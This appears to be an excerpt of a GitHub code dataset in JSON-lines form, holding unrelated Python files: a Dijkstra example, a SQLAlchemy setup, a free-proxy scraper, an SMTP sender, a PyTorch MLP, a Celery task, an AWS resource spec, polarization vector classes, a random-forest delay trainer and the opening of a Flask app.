costs.update({key: value})\n parents.update({key: start_node})\n queue += key\n check_list += key\n \n while queue != deque([]):\n node = queue.popleft()\n children = graph[node]\n if children != {}:\n for key in children.keys():\n if not key in check_list:\n costs.update({key: infinity})\n parents.update({key: None})\n queue += key\n return costs, parents\n\n\ndef update_costs_list_dijkstra_algorithm(graph: dict, costs: dict) -> tuple:\n processed = []\n node = find_lowest_cost_node(costs, processed)\n while node is not None:\n cost = costs[node]\n neighbors = graph[node]\n for key in neighbors.keys():\n new_cost = cost + neighbors[key]\n if costs[key] > new_cost: \n costs[key] = new_cost\n parents[key] = node\n \n processed.append(node)\n node = find_lowest_cost_node(costs, processed)\n return costs, parents\n\n\ndef find_lowest_cost_node(costs: dict, processed: list):\n lowest_cost = float(\"inf\")\n lowest_cost_node = None\n for key, value in costs.items():\n if value < lowest_cost and not key in processed:\n lowest_cost = value \n lowest_cost_node = key\n return lowest_cost_node\n\n\n#call a function that creates initial tables \ncosts, parents = create_costs_and_parents(graph, 'A')\n\n\n#print tables before use dijkstra algorithm \nprint('Initial Tables')\nprint('Parents {node: parent}: ', parents)\nprint('Costs:', costs, '\\n')\n\n\n#call the function with implent dijkstra algorithm \nlowest_costs, parents = update_costs_list_dijkstra_algorithm(graph, costs)\n\n\n#Find the shortest way from A node to G node \nnode = 'G'\nway = ['G']\nwhile node != 'A':\n node = parents[node]\n way.append(node)\n\nway = way[::-1]\n\n\n#print tables after use dijkstra algorithm \nprint('End Tables')\nprint('Way:', way)\nprint('Lowest costs:', lowest_costs)\nprint('Parents {node: parent}: ', parents)\n\n\n\n\n\n","repo_name":"pawelgoj/Examples-of-some-algorithms","sub_path":"Graphs_algorithms/dijkstra_algorithm.py","file_name":"dijkstra_algorithm.py","file_ext":"py","file_size_in_byte":3010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20419064981","text":"from sqlalchemy.engine import create_engine\r\nfrom sqlalchemy.orm import sessionmaker\r\nfrom sqlalchemy.ext.declarative import declarative_base\r\n\r\n__all__ = (\r\n \"define_session_sqlite\",\r\n)\r\n\r\nsqlite_engine = create_engine(\r\n 'sqlite:///db/data/wn.db', connect_args={\"check_same_thread\": False}, echo=False)\r\ndefine_session_sqlite = sessionmaker(bind=sqlite_engine)\r\nSQLiteBase = declarative_base(bind=sqlite_engine)\r\n","repo_name":"lookthisline/selenium","sub_path":"db/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16410427017","text":"\"\"\"\nМодуль парсит сайт с прокси , отбирает подходящие по scheme и возвращает 1 из выбранных\n\"\"\"\n\nimport requests\nfrom bs4 import BeautifulSoup\nfrom random import choice\n\n\nPROXY_URL = 'https://free-proxy-list.net'\n# Использовать прокси для поиска прокси ? При True работает очень медленно\nPROXY_FOR_PROXY = None\n# Какая схема нужна ? ['yes'] = 'HTTPS' , ['no'] = 'HTTP' , ['yes','no'] = HTTP+HTTPS\nNEED = ['yes']\n# TIMEOUT проверки ip\nTIME_OUT_CHECK = 30\n# TIMEOUT поиска прокси\nTIME_OUT_SEARCH = 15\n\n# Сайты для определения ip ( изменилось или нет )\nIP_HTTP_URL = 'http://httpbin.org/ip'\nIP_HTTPS_URL = 'https://2ip.ua/ru/'\n\n\ndef get_HTML (url, proxy=None) :\n rspns = requests.get (url, proxies = proxy, timeout = TIME_OUT_SEARCH)\n if rspns.status_code != 200 :\n print ('ERROR {} . I CANT CONNECT TO THE PROXY LIST'.format(rspns.status_code))\n exit(1)\n return rspns.text\n\n\ndef get_proxies_list (html, MAX=50) :\n soup = BeautifulSoup (html, 'lxml')\n table_body = soup.find('table',id='proxylisttable').find('tbody')\n trs = table_body.find_all('tr', recursive=False)\n lenght = len (trs)\n iCkeck = 0\n PROXY_LIST = []\n while (iCkeck < lenght) and len(PROXY_LIST) < MAX :\n tds = trs[iCkeck].find_all('td')\n if tds[6].text in NEED :\n DATA = dict()\n DATA['https' if tds[6].text == 'yes' else 'http'] = '{0}:{1}'.format(tds[0].text,tds[1].text)\n PROXY_LIST.append(DATA)\n iCkeck += 1\n return PROXY_LIST\n\n\ndef get_new_proxy (MAX=30) :\n # Возвращает адрес прокси сервера\n global PROXY_FOR_PROXY\n hyper_text = get_HTML (PROXY_URL, PROXY_FOR_PROXY)\n P_LIST = get_proxies_list (hyper_text, MAX)\n if not P_LIST :\n print ('НЕ УДАЛОСЬ НАЙТИ PROXY')\n exit(1)\n proxy = choice (P_LIST)\n P_LIST.remove(proxy)\n #PROXY_FOR_PROXY = choice ( P_LIST ) TROUBLES\n return proxy\n\n\ndef ip_HTTP (proxy) :\n # Проверка ip при http соединении\n r = requests.get(IP_HTTP_URL, proxies = proxy, timeout = TIME_OUT_CHECK)\n print ('connected ', end = '')\n IP = r.json()['origin']\n try :\n return IP.split(',')[0]\n except:\n return IP\n\n\ndef ip_HTTPS (proxy) :\n # Проверка ip при https соединении\n r = requests.get(IP_HTTPS_URL, proxies = proxy, timeout= TIME_OUT_CHERK)\n print ('connected ', end = '')\n soup = BeautifulSoup (r.text,'lxml')\n span = soup.find('span', {'class': \"copy-clipboard\", 'data-toggle': \"tooltip\"})\n IP = span.get('data-clipboard-text')\n return IP\n\ndef test ( ) :\n # Функция для теста модуля\n global NEED\n NEED = ['yes']\n print('\\n\\nHTTPS PROXIES\\n\\n',end = '')\n for i in range (10) :\n proxy_s = get_new_proxy (MAX = 25)\n print (proxy_s)\n try :\n print (IP_HTTPS(proxy_s ))\n except :\n print (\"ПРОБЛЕМЫ С ОПРЕДЕЛЕНИЕМ IP\")\n NEED = ['no']\n print('\\n\\nHTTP PROXIES\\n\\n', end = '')\n for i in range ( 10 ) :\n proxy = get_new_proxy (MAX = 25)\n print (proxy)\n try :\n print (IP_HTTP ( proxy ))\n except :\n print (\"ПРОБЛЕМЫ С ОПРЕДЕЛЕНИЕМ IP\")\n\nif __name__ == \"__main__\":\n test ( )\n","repo_name":"JustTryPy/pynterest","sub_path":"proxy_search.py","file_name":"proxy_search.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41182236168","text":"import smtplib\r\nfrom email.mime.text import MIMEText\r\n\r\nbody = \"this is test email how are you :D\"\r\n\r\nmsg = MIMEText(body)\r\nmsg['From'] = \"@.com\"\r\nmsg['To']=\"@.com\"\r\nmsg['Subject']=\"Hello\"\r\n\r\nserver = smtplib.SMTP('smtp..com',)\r\nserver.starttls()\r\nserver.login(\"\", \"\")\r\nserver.send_message(msg)\r\n\r\nprint(\"mail sent\")\r\n\r\nserver.quit()","repo_name":"aydanufuk/Python","sub_path":"networking/emailclient.py","file_name":"emailclient.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20139488007","text":"\nfrom torch import nn\nimport math\n\n\nclass MLP(nn.Module):\n\n def __init__(self, n_inpt, n_hiddens, activation=None, activate_final=False, weight_init=True,\n mode='truncated_normal'):\n super(MLP, self).__init__()\n\n if activation is None:\n activation = nn.ReLU()\n\n self._activation = activation\n\n self._layers = []\n for n_hidden in n_hiddens:\n self._layers.append(nn.Linear(n_inpt, n_hidden))\n self._layers.append(activation)\n n_inpt = n_hidden\n\n if not activate_final:\n self._layers = self._layers[:-1]\n\n self.net = nn.Sequential(*self._layers)\n\n if weight_init:\n self.weight_init(mode=mode)\n\n def weight_init(self, mode='xavier'):\n if mode == 'xavier':\n print('We are now using xavier')\n initializer = xavier_init\n elif mode == 'truncated_normal':\n print('We are now using truncated normals')\n initializer = truncated_normal_init\n else:\n raise NotImplementedError\n\n for block in self._modules:\n if block == '_activation':\n continue\n else:\n for m in self._modules[block]:\n initializer(m)\n\n def forward(self, x):\n return self.net(x)\n\n\ndef xavier_init(m):\n if isinstance(m, (nn.Linear, nn.Conv2d)):\n nn.init.xavier_normal_(m.weight)\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):\n m.weight.data.fill_(1)\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n\ndef truncated_normal_init(m):\n if isinstance(m, (nn.Linear, nn.Conv2d)):\n truncated_normal(m.weight, mean=0, std=1 / math.sqrt(m.weight.shape[1]))\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n elif isinstance(m, (nn.BatchNorm1d, nn.BatchNorm2d)):\n m.weight.data.fill_(1)\n if m.bias is not None:\n m.bias.data.fill_(0)\n\n\ndef truncated_normal(tensor, mean, std):\n # https://discuss.pytorch.org/t/implementing-truncated-normal-initializer/4778/15\n size = tensor.shape\n tmp = tensor.new_empty(size + (4,)).normal_()\n valid = (tmp < 2) & (tmp > -2)\n ind = valid.max(-1, keepdim=True)[1]\n tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1))\n tensor.data.mul_(std).add_(mean)\n return tensor\n","repo_name":"oxcsml/lie-transformer","sub_path":"eqv_transformer/neural.py","file_name":"neural.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"53"} +{"seq_id":"20344656934","text":"# class Dog :\n# kind = 'canine'\n# def __init__(self,name) :\n# self.name = name\n\n# my_dog = Dog('namu')\n# your_dog = Dog('gazi')\n# print(my_dog.kind)\n# print(your_dog.kind)\n# print(my_dog.name)\n# print(your_dog.name)\n\n\n# class Dog:\n# # 모든 클래스가 공유하는 값이다. - 그래서 이름이 클래스 변수\n# tricks = []\n\n# def __init__(self, name):\n# self.name = name\n\n# def add_trick(self, trick):\n# self.tricks.append(trick)\n\n\n# my_dog = Dog('namu')\n# your_dog = Dog('gazi')\n\n# my_dog.add_trick('hello')\n# your_dog.add_trick('byebye')\n\n# print(my_dog.tricks)\n# print(your_dog.tricks)\n\n\nclass Dog:\n def __init__(self, name):\n self.name = name\n self.tricks = []\n\n def add_trick(self, trick):\n self.tricks.append(trick)\n\n\nmy_dog = Dog('namu')\nyour_dog = Dog('gazi')\n\nmy_dog.add_trick('hello')\nyour_dog.add_trick('byebye')\n\nprint(my_dog.tricks)\nprint(your_dog.tricks)\n\n# print(help(str))\nprint(help(str.capitalize))\n\n# 우리가 사용할땐 이런 형태지만\n# 단축형\n'apple'.capitalize()\n\n# 실제로는 작동되는 방식\nstr.capitalize('apple')\n\n# 절차 지향 vs 객체 지향\n# 데이터가 흘러 다니는 것으로 보는 시각 -> 데이터가 중심이 되는 시각\n\n# 절차 지향\n# 데이터가 변수에 들어가고\ndef greeting(name) :\n return f'hello, {name}'\n\nprint(greeting('harry'))\n\n# 객체 지향\n# 데이터가 중심이 되는 시각\nclass Person :\n def __init__(self,name):\n self.name = name\n\n def greeting(self) :\n return f'hello, {self.name}'\n\nmy_var = Person('harry')\nprint(my_var.greeting())","repo_name":"Alphanewbie/Django","sub_path":"python/python_class.py","file_name":"python_class.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18776930376","text":"\nfrom __future__ import absolute_import, unicode_literals\nfrom ADSWorker import app as app_module\nfrom adsputils import get_date, exceptions\nfrom ADSWorker.models import KeyValue\nfrom kombu import Queue\n\n# ============================= INITIALIZATION ==================================== #\n\napp = app_module.ADSWorkerPipelineCelery('ADSWorker')\nlogger = app.logger\n\n\napp.conf.CELERY_QUEUES = (\n Queue('errors', app.exchange, routing_key='errors', durable=False, message_ttl=24*3600*5),\n Queue('some-queue', app.exchange, routing_key='some-queue')\n)\n\n\n# ============================= TASKS ============================================= #\n\n@app.task(queue='some-queue')\ndef task_hello_world(message):\n \"\"\"\n Fetch a message from the queue. Save it into the database.\n And print out into a log.\n \n\n :param: message: contains the message inside the packet\n {\n 'name': '.....',\n 'start': 'ISO8801 formatted date (optional), indicates \n the moment we checked the orcid-service'\n }\n :return: no return\n \"\"\"\n \n if 'name' not in message:\n raise exceptions.IgnorableException('Received garbage: {}'.format(message))\n \n with app.session_scope() as session:\n kv = session.query(KeyValue).filter_by(key=message['name']).first()\n if kv is None:\n kv = KeyValue(key=message['name'])\n \n now = get_date()\n kv.value = now\n session.add(kv)\n session.commit()\n \n logger.info('Hello {key} we have recorded seeing you at {value}'.format(**kv.toJSON()))\n \n \n \n \n\nif __name__ == '__main__':\n app.start()","repo_name":"romanchyla/ADSWorker","sub_path":"ADSWorker/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"294031728","text":"\"\"\"Resource representing an AWS Account\"\"\"\nfrom typing import List, Type\n\nfrom botocore.client import BaseClient\n\nfrom altimeter.aws.resource.resource_spec import ScanGranularity, ListFromAWSResult, AWSResourceSpec\nfrom altimeter.aws.resource.unscanned_account import UnscannedAccountResourceSpec\nfrom altimeter.core.resource.resource_spec import ResourceSpec\nfrom altimeter.core.graph.field.scalar_field import ScalarField\nfrom altimeter.core.graph.schema import Schema\n\n\nclass AccountResourceSpec(AWSResourceSpec):\n \"\"\"Resource representing an AWS Account\"\"\"\n\n type_name = \"account\"\n service_name = \"sts\"\n scan_granularity = ScanGranularity.ACCOUNT\n schema = Schema(ScalarField(\"account_id\"))\n allow_clobber: List[Type[ResourceSpec]] = [UnscannedAccountResourceSpec]\n\n @classmethod\n def get_full_type_name(cls: Type[\"AccountResourceSpec\"]) -> str:\n return f\"{cls.provider_name}:{cls.type_name}\"\n\n @classmethod\n def list_from_aws(\n cls: Type[\"AccountResourceSpec\"], client: BaseClient, account_id: str, region: str\n ) -> ListFromAWSResult:\n \"\"\"This resource is somewhat synthetic, this method simply returns a dict of form\n {'account_arn': {account_dict}\"\"\"\n sts_account_id = client.get_caller_identity()[\"Account\"]\n if sts_account_id != account_id:\n raise ValueError(f\"BUG: sts detected account_id {sts_account_id} != {account_id}\")\n accounts = {f\"arn:aws::::account/{sts_account_id}\": {\"account_id\": sts_account_id}}\n return ListFromAWSResult(resources=accounts)\n\n @classmethod\n def generate_arn(\n cls: Type[\"AccountResourceSpec\"],\n resource_id: str,\n account_id: str = \"\",\n region: str = \"\",\n ) -> str:\n \"\"\"Generate an ARN for this resource\"\"\"\n return f\"arn:aws::::account/{resource_id}\"\n","repo_name":"tableau/altimeter","sub_path":"altimeter/aws/resource/account.py","file_name":"account.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"53"} +{"seq_id":"31077595530","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 03 14:32:21 2015\n\n@author: Grantland\n\"\"\"\n\nfrom numpy import arctan2, sin, cos, arcsin, angle, sqrt, pi, exp\nfrom numpy import isclose, allclose\nfrom unitutils import unitize_a\n\ndef _isclosemod(a, b, atol=1E-5, mod=2*pi):\n \"\"\"\n Return whether two numbers (or arrays) are within atol of each other\n in the modulo space determined by mod.\n \"\"\"\n return (isclose(a%mod, b%mod, atol=atol) \n or isclose((a+atol)%mod, (b+atol)%mod, atol=atol))\n\nclass PolarizationVector:\n def __init__(self, *args):\n \"\"\"\n Essentially just an abstraction of complex numbers, representing the\n electric field at a specific point in space-time.\n Takes amplitude and wave phase in radians, or a complex number.\n \"\"\"\n if len(args) == 2:\n # Args are amplitude, phase\n self.pol = args[0]*(exp(1j*args[1]))\n elif len(args) == 1:\n # Arg is complex number\n self.pol = args[0]\n def __add__(self, other):\n a1 = self.amp\n a2 = other.amp\n p1 = self.phase\n p2 = other.phase\n amp_new = sqrt(a1**2 + a2**2 + 2*a1*a2*cos(p1-p2))\n phase_new = arctan2( a1*sin(p1) + a2*sin(p2), a1*cos(p1) + a2*cos(p2) )\n return PolarizationVector(amp_new, phase_new)\n def __sub__(self, other):\n a1 = self.amp\n a2 = -other.amp\n p1 = self.phase\n p2 = other.phase\n amp_new = sqrt(a1**2 + a2**2 + 2*a1*a2*cos(p1-p2))\n phase_new = arctan2( a1*cos(p1) + a2*cos(p2), a1*sin(p1) + a2*sin(p2) )\n return PolarizationVector(amp_new, phase_new)\n def __mul__(self, num):\n \"\"\"Scalar multiplication.\"\"\"\n assert isinstance(num, (int, long, float, complex))\n amp_new = self.amp * abs(num)\n phase_new = self.phase + angle(num)\n return PolarizationVector(amp_new, phase_new)\n def __rmul__(self, num):\n \"\"\"Scalar multiplication.\"\"\"\n assert isinstance(num, (int, long, float, complex))\n amp_new = self.amp * abs(num)\n phase_new = self.phase + angle(num)\n return PolarizationVector(amp_new, phase_new)\n @property\n def power(self):\n \"\"\"\n Power is the square of the amplitude of the electric field.\n \"\"\"\n return self.amp**2\n @property\n def amp(self):\n return abs(self.pol)\n @property\n def phase(self):\n return angle(self.pol)\n def __eq__(self, other):\n \"\"\"\n Check if vector is essentially equal to another. This makes it\n easy to confirm that vector transformations are behaving as they\n should.\n \"\"\"\n if not _isclosemod(self.phase, other.phase):\n if _isclosemod(self.phase, other.phase+pi):\n # If they're pi out of phase, flip one of the amplitudes\n return isclose(self.amp, -other.amp, atol=1E-5)\n else:\n return False\n return isclose(self.amp, other.amp)\n def __ne__(self, other):\n #This isn't the default behavior because \n return not self==other\n def __repr__(self):\n return \"Amplitude: {}\\nRelative phase: {}\".format(self.amp, self.phase)\n\nclass StokesVector:\n def __init__(self, *args):\n \"\"\"\n Takes either I, Q, U, V or two perpendicular PolarizationVectors,\n and returns the Stokes representation.\n \"\"\"\n if len(args) == 4:\n # stokes repr\n self.I = args[0]\n self.Q = args[1]\n self.U = args[2]\n self.V = args[3]\n self.phase = 0\n elif len(args) == 5:\n # stokes repr with phase\n self.I = args[0]\n self.Q = args[1]\n self.U = args[2]\n self.V = args[3]\n self.phase = args[4]\n elif len(args) == 2:\n x = args[0]\n y = args[1]\n self.I = x.power + y.power\n self.Q = x.power - y.power\n self.U = 2*x.amp*y.amp*(cos(x.phase-y.phase))\n self.V = -2*x.amp*y.amp*(sin(x.phase-y.phase))\n if isclose(x.amp, 0, atol=1E-5):\n if isclose(y.amp, 0, atol=1E-5):\n self.phase = 0\n else:\n \"\"\"\n If x is zero, use y phase. Since stokes vectors can't be\n modified except by casting to cartesian coordinates, the\n result of this check will be preserved.\n \"\"\"\n self.phase = y.phase\n else:\n self.phase = x.phase\n else:\n raise TypeError(\"Arguments must either be I, Q, U, V or two \" \\\n \"perpendicular PolarizationVectors.\")\n @property\n def cartesian(self):\n \"\"\"\n Returns the PolarizationTwoVector corresponding to the Stokes vector.\n \"\"\"\n tilt = arctan2(self.U, self.Q)/2\n if self.I == 0:\n elipticity = 0\n else:\n elipticity = arcsin(self.V/self.I)/2\n E_x = sqrt(self.I)*(cos(tilt)*cos(elipticity)-1j*sin(tilt)*sin(elipticity))\n E_y = sqrt(self.I)*(sin(tilt)*cos(elipticity)+1j*cos(tilt)*sin(elipticity))\n # Since pure Stokes vectors don't preserve phase, reconstruct from saved phase\n if isclose(E_x, 0, atol=1E-5):\n offset = self.phase-angle(E_y)\n else:\n offset = self.phase-angle(E_x)\n E_x = E_x*exp(1j*offset)\n E_y = E_y*exp(1j*offset)\n v_x = PolarizationVector(E_x)\n v_y = PolarizationVector(E_y)\n return PolarizationTwoVector(v_x, v_y)\n @property\n def vect(self):\n return [self.I, self.Q, self.U, self.V]\n @property\n def pol_angle(self):\n return (0.5*arctan2(self.U,self.Q))%(2*pi)\n def rot(self, angle):\n \"\"\"Returns rotated copy of self.\"\"\"\n return self.cartesian.rot(angle).stokes\n def _rot(self, angle):\n \"\"\"Rotates self by angle.\"\"\"\n self = self.rot(angle)\n def __add__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return (self.cartesian+other).stokes\n def __sub__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return (self.cartesian-other).stokes\n def __eq__(self, other):\n \"\"\"\n Returns whether or not two stokes vectors are essentially equal.\n \"\"\"\n if isinstance(other, StokesVector):\n return allclose([self.I, self.Q, self.U, self.V], \n [other.I, other.Q, other.U, other.V], atol=1E-5) and (\n _isclosemod(self.phase, other.phase) or isclose(self.I, 0, atol=1E-5))\n elif isinstance(other, PolarizationTwoVector):\n return self == other.stokes\n def __ne__(self, other):\n #This isn't the default behavior because \n return not self==other\n def __repr__(self):\n return \"I: {}, Q: {}, U: {}, V: {}, Phase: {}\".format(\n self.I, self.Q, self.U, self.V, self.phase) \n \nclass PolarizationTwoVector:\n \"\"\"\n This class is similar to a Stokes Vector,\n but designed to allow phase-offset vector addition.\n \"\"\"\n def __init__(self, vector_x, vector_y):\n self.v_x = vector_x\n self.v_y = vector_y\n def rot(self, angle):\n \"\"\"Return rotated copy of self.\"\"\"\n rad = unitize_a(angle)\n x_to_rot_x = self.v_x.amp*cos(rad)\n x_to_rot_y = -self.v_x.amp*sin(rad)\n y_to_rot_x = self.v_y.amp*sin(rad)\n y_to_rot_y = self.v_y.amp*cos(rad)\n new_x = PolarizationVector(x_to_rot_x, self.v_x.phase) + \\\n PolarizationVector(y_to_rot_x, self.v_y.phase)\n new_y = PolarizationVector(x_to_rot_y, self.v_x.phase) + \\\n PolarizationVector(y_to_rot_y, self.v_y.phase)\n return PolarizationTwoVector(new_x, new_y) \n def _rot(self, angle):\n \"\"\"Rotate self by angle.\"\"\"\n self = self.rot(angle)\n def __add__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return PolarizationTwoVector( self.v_x + other.v_x, \n self.v_y + other.v_y )\n def __sub__(self, other):\n if not isinstance(other, PolarizationTwoVector):\n other = other.cartesian\n return PolarizationTwoVector( self.v_x - other.v_x,\n self.v_y - other.v_y)\n @property\n def stokes(self):\n return StokesVector(self.v_x, self.v_y)\n @property\n def I(self):\n return self.stokes.I\n @property\n def Q(self):\n return self.stokes.Q\n @property\n def U(self):\n return self.stokes.U\n @property\n def V(self):\n return self.stokes.V\n def __eq__(self, other):\n if isinstance(other, PolarizationTwoVector):\n return self.v_x == other.v_x and self.v_y == other.v_y\n elif isinstance(other, StokesVector):\n return self.stokes == other\n def __ne__(self, other):\n #This isn't the default behavior because \n return not self==other\n def __repr__(self):\n return \"X:\\n{}\\nY:\\n{}\".format(self.v_x, self.v_y)\n","repo_name":"ghallsimpsons/characteristic-matrix","sub_path":"vector_types.py","file_name":"vector_types.py","file_ext":"py","file_size_in_byte":9357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24584634927","text":"import argparse\nimport pandas as pd\nimport numpy as np\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nimport utils\nfrom numpy.random import seed\nimport os\nimport time\nimport joblib\nimport json\n\nRANDOM_STATE = 42\nseed(RANDOM_STATE)\n\n# Grid for best parameter search\nPARAM_GRID = [{'n_estimators': [50, 70, 100, 130], 'max_features': [2,4,6,8,10], 'max_depth':[5,10,20,25,50]},\n {'bootstrap':[False],'n_estimators': [50, 70, 100, 130], 'max_features': [2,4,6,8,10],\n 'max_depth':[5,10,20,25,50]}]\n\ndef get_args():\n \"\"\"Function to parse arguments that are used to configure the training job\n \n Args:\n None: No explicit function arguments. Arguments are passed through command line\n \n Returns:\n args: parsed arguments\n \"\"\"\n parser = argparse.ArgumentParser(\"training hyperparameters\")\n \n parser.add_argument(\n '--target',\n type=str,\n default='delay',\n metavar='L',\n help=\"the label for training which can be either delay or delayed_traffic\"\n )\n\n parser.add_argument(\n '--nmir_files',\n type=str,\n nargs='*',\n metavar='F',\n help=\"pass filenames containing NMIR data for training, each seperated by space\"\n )\n parser.add_argument(\n '--test_size',\n type=float,\n default=0.3,\n metavar='TS',\n help=\"fraction of dataset to be used for testing\"\n )\n parser.add_argument(\n '--n_folds_cv',\n type=int,\n default=10,\n metavar='CV',\n help=\"number of folds for cross validation during grid search\"\n )\n parser.add_argument(\n '--custom_parameters',\n action='store_true',\n default=False,\n help=\"use this option to when you want to manually define hyperparameters for the model\"\n )\n parser.add_argument(\n '--n_estimators',\n type=int,\n default=None,\n metavar='NE',\n help=\"number of estimators for the Random Forest Estimator\"\n )\n parser.add_argument(\n '--max_features',\n type=int,\n default=None,\n metavar='MF',\n help=\"max number of features to be used from all the features for the Estimator\"\n )\n parser.add_argument(\n '--max_depth',\n type=int,\n default=None,\n metavar='MD',\n help=\"max depth for each Estimator\"\n )\n parser.add_argument(\n '--bootstrap',\n action='store_true',\n default=False,\n help=\"whether to use bootstrap during training\"\n )\n args = parser.parse_args()\n return args\n\ndef train_custom_rf_model(X_train, y_train, random_state, **rf_parameters):\n '''Function to train a Random Forest Regressor with defined hyperparameters\n passed as kwargs.\n\n Args:\n X_train (pd dataframe or np array): a 2D (training samples X features) dataframe or a numpy array\n y_train (pd dataframe or np array): a single column target value for training\n random_state (int): seed to keep the results consistent\n **rf_parameters (**kwargs): the hyperparameters for Random forest Regressor\n \n Returns:\n rf_model: A Random Forest Regressor model fit on the training data\n '''\n rf_model = RandomForestRegressor(random_state=RANDOM_STATE, n_jobs=-1, **rf_parameters)\n rf_model.fit(X_train, y_train)\n return rf_model\n\ndef perform_grid_search(X_train, y_train, n_folds_cv, random_state):\n '''Function to perform a k-fold grid search and get model with best parameters from the grid.\n\n Args:\n X_train (pd dataframe or np array): a 2D (training samples X features) dataframe or a numpy array\n y_train (pd dataframe or np array): a single column target value for training\n n_folds_cv (int): number of folds for cross validation during grid search\n random_state (int): seed to keep the results consistent\n \n Returns:\n rf_model: A Random Forest Regressor model fit on the training data with the best parameters\n obtained from grid search\n '''\n rf_model = RandomForestRegressor()\n grid_search = GridSearchCV(rf_model, PARAM_GRID, cv=n_folds_cv, scoring='neg_mean_absolute_error', n_jobs=-1, verbose=1)\n grid_search.fit(X_train, y_train)\n rf_model = grid_search.best_estimator_.fit(X_train, y_train)\n return rf_model\n\ndef save_rf_model(rf_model, job_dir):\n joblib.dump(rf_model, os.path.join(utils.OUTPUT_DIR, job_dir, 'rf_model.save'))\n\ndef save_rf_model_metadata(rf_model, job_dir):\n metadata_save_path = os.path.join(utils.OUTPUT_DIR, job_dir, \"rf_model_metadata.json\")\n with open(metadata_save_path, 'w') as outfile:\n json.dump(rf_model.get_params(), outfile)\n\ndef train(job_dir, train_filenames, target='delay', test_size=0.3, n_folds_cv=10, **rf_parameters):\n '''Function to train a RF model. The hyperparameters are tuned using gridsearch if enabled\n '''\n print(\"Reading the raw data.....\", flush=True)\n raw_df = pd.read_csv(os.path.join(utils.NMIR_DATA_DIR, train_filenames[0]))\n for f in range(1, len(train_filenames), 1):\n join_df = pd.read_csv(os.path.join(utils.NMIR_DATA_DIR, train_filenames[f]))\n raw_df = pd.concat((raw_df, join_df), axis=0).reset_index(drop=True)\n\n print(\"Transforming the data.....\", flush=True)\n daywise = utils.transform_to_daywise_basic(raw_df)\n X = daywise.drop(columns=['Date', 'ATFM Delay (min)', 'MP Delayed Traffic'])\n if target == 'delay':\n y = daywise['ATFM Delay (min)']\n else:\n y = daywise['MP Delayed Traffic']\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=test_size, random_state=RANDOM_STATE)\n\n if rf_parameters:\n print(\"Training RF regressor with the passed hyper-parameters.....\", flush=True)\n rf_model = train_custom_rf_model(X_train, y_train, random_state=RANDOM_STATE, **rf_parameters)\n else:\n print(\"Performing grid search to find the best hyper-parameters.....\", flush=True)\n rf_model = perform_grid_search(X_train, y_train, n_folds_cv, random_state=RANDOM_STATE)\n \n y_pred_train = rf_model.predict(X_train)\n y_pred_test = rf_model.predict(X_test)\n utils.print_metrics(y_train, y_pred_train, y_test, y_pred_test, target)\n\n print(\"Saving training results, metadata, and the model\", flush=True)\n \n utils.save_line_plots(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.save_scatter_plots(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.save_predictions(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n save_rf_model(rf_model, job_dir)\n save_rf_model_metadata(rf_model, job_dir)\n utils.save_training_file_info(train_filenames, job_dir)\n utils.save_metrics_detailed(y_train, y_pred_train, y_test, y_pred_test, target, job_dir)\n utils.register_job_log(job_dir, y_train, y_pred_train, y_test, y_pred_test)\n \nif __name__ == \"__main__\":\n args = vars(get_args())\n if args['nmir_files'] is None:\n raise FileNotFoundError(\"Please pass the names of the NMIR files that are to be used for training\")\n rf_parameters = {}\n for par in ['n_estimators', 'max_features', 'max_depth', 'bootstrap']:\n if args[par]:\n rf_parameters[par] = args[par]\n timestr = time.strftime(\"%Y%m%d-%H%M%S\") # to make a folder where job related files are saved\n job_dir = 'RF_' + timestr\n utils.create_job_dir(job_dir)\n if args['custom_parameters']:\n train(job_dir, train_filenames=args['nmir_files'], target=args['target'], test_size=args['test_size'], **rf_parameters)\n else:\n train(job_dir, train_filenames=args['nmir_files'], target=args['target'], test_size=args['test_size'], n_folds_cv=args['n_folds_cv'])","repo_name":"brianpinto91/atfm-delay-prediction","sub_path":"training/rf_trainer.py","file_name":"rf_trainer.py","file_ext":"py","file_size_in_byte":7945,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"34281651843","text":"from flask import Flask, render_template\nimport sqlite3, db1, os, time\napp = Flask(__name__)\n#app.config['SERVER_NAME'] = '10.0.0.95:5000'\n#app.root_path = os.path.dirname(os.path.abspath(__file__))\nmessage = '

Данные загружаются. Пожалуйста, обновите страницу через пару минут.

